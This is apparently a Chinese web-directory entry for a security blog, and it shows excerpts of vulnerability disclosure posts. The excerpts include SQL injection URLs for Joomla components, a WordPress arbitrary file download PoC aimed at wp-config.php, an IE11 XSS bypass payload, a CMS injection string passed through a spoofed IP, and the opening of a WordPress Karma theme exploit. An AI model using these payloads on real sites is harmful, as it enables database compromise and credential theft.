90' s Blog|关注网络信息安全 www.unhonker.com

90' s Blog|关注网络信息安全

站名: 90' s Blog|关注网络信息安全

网址: http://www.unhonker.com

目录: 电脑网络 > 安全

PR:

Alexa: 1,215,011

备案号: 鲁ICP备14009374号

服务器IP: 121.29.54.173   河北省石家庄市 联通ADSL

描述: unhonker信息安全博客,记录本人在信息安全圈子的成长过程,主要包括网络安全,信息安全,代码审计,IT资讯相关文章,致力于更专业的网络信息安全博客www.unhonker.com

查询: [ 网站综合查询 | PR查询 | Alexa排名 | 同IP网站 ]

详细介绍

90' s Blog|关注网络信息安全90博客|www.unhonker.com搜索首页个人关注技术文章漏洞公布业界新闻About meXss测试平台邀请码[12月4日更新]Links:http://xss.re/2015年11月30日 23:20 重新开启邀请码:d0bee52a6dd0f7a770d109cffa31a49da49fd8767a827b5d9c6075d0cc6e3e91eb00f5a5c36d03055c7807c7c716fb245d85d80499b324c6596b501265a43ea6e31b55764ce905cd3aa17734b189850916943fffcecd1759e3314df762aa215aaccde626f685af525164571219d197dcc87c11639bd4170b9863392f4787682dff169ce65b6006269b817a...作者:unhonker| 发布:2013年1月08日 | 分类:个人关注 | 被撸:73,790次| 标签:xss平台邀请码432条评论burpsuite V1.7.11之前的版本貌似都集体失效了,这个版本是目前可以用的,刚测试了下。下载地址:Burp v1.7作者:unhonker| 发布:2016年12月05日 | 分类:个人关注 | 被撸:108次| 标签:Burp1.7抢沙发Joomla com_jsjobs SQL注入漏洞Exp:http://127.0.0.1/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=2&oi=680'作者:unhonker| 发布:2016年9月01日 | 分类:漏洞公布 | 被撸:1,275次| 标签:Joomla漏洞抢沙发WordPress强制下载任意文件下载漏洞####################### PoC####################### [+] Using `force-download.php` file from `Wordpress websites we can download any file.## [!] http://ihonker.org/force-download.php?file=wp-config.php#######################作者:unhonker| 发布:2016年8月21日 | 分类:漏洞公布 | 被撸:1,740次| 标签:wordpress漏洞抢沙发WordPress WP Fastest Cache 0.8.5.9 文件包含漏洞
WordPress WP Fastest Cache plugin version 0.8.5.9 suffers from a local file inclusion vulnerability.
<html>
<body>
<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wpfc_cdn_template_ajax_req...
作者:unhonker| 发布:2016年7月13日 | 分类:漏洞公布 | 被撸:1,211次| 标签:wordpress漏洞抢沙发
IE11 XSS 过滤器绕过漏洞
EXP:
http://unhonker.com/xss.php?x=%3Cmeta%20charset=cp1025%3E%27%20L%C9%86%D9%81%D4%85%40%C9%84~[%40%D6%95%D4%96%E4%A2%85%D6%A5%C5%99~m~%60JZ^NNm^mm~mNm^mmmm~mmNmm^mmmmmm~mmmmNmm^[JMOO}}N}}]JmZNMOO}}N}}]JmmZNMOO}}N}}]JmmmmZNMO}}N}}]JmZNM[N}}]JmmmmmmZZMm]n
作者:unhonker| 发布:2016年6月14日 | 分类:漏洞公布 | 被撸:1,146次| 标签:IE11漏洞抢沙发
Joomla com_availcal – SQL注入漏洞
PoC:
# http://www.site.com/index.php?option=com_availcal&format=update&id=[SQL]
作者:unhonker| 发布:2016年6月08日 | 分类:漏洞公布 | 被撸:1,499次| 标签:Joomla漏洞抢沙发
青客云sql注入漏洞第二发
本文出自红客联盟 太极实验室(ihonker.org)
这次不是延时注入,问题是出现在评论时获取ip处,
在发表评论的时候,发现,ip可以伪造,并且被带入到feedback数据库里面,一枚完美的注入产生了,在发表评论的时候,ip伪造下
8.8.8.8\",'IANA',user(),'','1463286558','0','','0')#
内容随便写,爆出了user()
其中1463286558表示的是时间
其中获取ip的函数
function g...
作者:unhonker| 发布:2016年6月07日 | 分类:漏洞公布 | 被撸:1,100次| 标签:青客云cms漏洞抢沙发
WordPress Karma 4.7 – Responsive Theme Exploit
<?php
/**
 * Exploit Title: Karma Theme Exploit
 * Version: 4.7
 * Tested on: Debian 8, PHP 5.6.17-3
 * Type: Authenticated Options overwrite, Stored XSS
 * Time line: Found [28-Apr-2016], Vendor notified [28-Apr-2016], Vendor fixed: [], [RD:1]
 */
 
 
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/s...
作者:unhonker| 发布:2016年6月07日 | 分类:漏洞公布 | 被撸:1,031次| 标签:wordpress抢沙发
绕过PHP5.2

猜你喜欢